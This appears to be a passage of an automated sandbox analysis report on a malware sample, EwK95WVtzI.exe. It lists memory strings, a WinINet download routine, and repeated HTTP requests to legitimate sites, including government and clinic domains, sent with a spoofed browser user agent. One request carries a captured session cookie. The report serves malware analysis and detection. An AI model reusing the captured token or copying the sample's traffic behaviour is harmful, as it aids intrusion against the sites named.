                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zdruzenje-manager.si/sl/o-zdruzenju/o-zdruzenju/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zds.si/sl/o-zds/predstavitev/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                Source: unknownDNS traffic detected: queries for: www.pdqhomes.com
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F1840 InternetCrackUrlA,InternetOpenA,InternetConnectA,HttpOpenRequestA,wnsprintfA,HttpAddRequestHeadersA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,HttpQueryInfoA,VirtualAlloc,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_013F1840
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comContent-Length: 4776
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comContent-Length: 4776
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.clinicasanluis.com.coCookie: XSRF-TOKEN=eyJpdiI6ImxEUHpsV3JtaW5IRVQ4eUNZTjRWTXc9PSIsInZhbHVlIjoiQm5aQmpPNlN0UkZHenk0WkZsZDNFSmFuMThINm5kVXR2dFZoS1dDYVlTaHRiUkZlZGQyYUcwZTltNnRnN0VseGpEMVVTQi8xbjgrYUR6VWFBOW5ZMEx3Q2t2cGg0bFZPc25wdnVwOCtFSlRPTHVxNmRwbFk2Z1JUeEtBek55MGoiLCJtYWMiOiI3YjAxYTZjNDBiYzA2MmMxN2E4MDJmMzM3NzE3MTE2MDcxYTlhN2Q5NmNmMjVkZDVkMjMxZjZiZTk2ZGRiNGY1IiwidGFnIjoiIn0%3D; clinicasanluis_session=eyJpdiI6IlpUQjN3YnJteGN4eUZ0NTFQRlhVV1E9PSIsInZhbHVlIjoidkg3VXU3WGhUSllXVmxQSXNKekozZE1sSWpKVGtYbWROcVhVaCtpNWI3VytPd0dDQlRJd2diajIwTzMrbTFOdXI2NmJWYUI1MXQwQ2ZVTlA5d0NxRHhjd0hWM0VVbnZXRkozVWgwTjdsTEI1MlJWdFVsQmUxWGErU3lrQ01HcDMiLCJtYWMiOiJjZjIzZjQ4ZjU4NmNhNTE4NGE3YzJiYmU3YjMyODMxMWQ3YjMwZjIyMmU4N2NkYWYwNjllNWM5OGE2NjM2N2JlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comContent-Length: 37524
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59265 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62435 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64616 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61580 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49451 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52633 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61109 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49463 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59253 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64628 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52645 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51319 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63303 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61122 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61592 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62447 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63761 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62460 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64641 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61134 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63315 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59289 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62459 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63327 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61543 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60291 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60217 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52621 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53845
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
                Source: unknownNetwork traffic detected: HTTP traffic on port 65521 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53537 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53841
                Source: unknownNetwork traffic detected: HTTP traffic on port 62496 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 57023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
                Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61158 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53855
                Source: unknownNetwork traffic detected: HTTP traffic on port 62868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
                Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65533 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
                Source: unknownNetwork traffic detected: HTTP traffic on port 57011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53867
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
                Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
                Source: unknownNetwork traffic detected: HTTP traffic on port 65508 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53865
                Source: unknownNetwork traffic detected: HTTP traffic on port 54851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
                Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62472 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 55731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49499 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 53525 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 62484 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
                Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51219
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51217
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53873
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53871
                Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
                Source: unknownNetwork traffic detected: HTTP traffic on port 50897 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51215
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53875
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
                Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51213
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
                Source: unknownNetwork traffic detected: HTTP traffic on port 60663 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61555 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53803
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53801
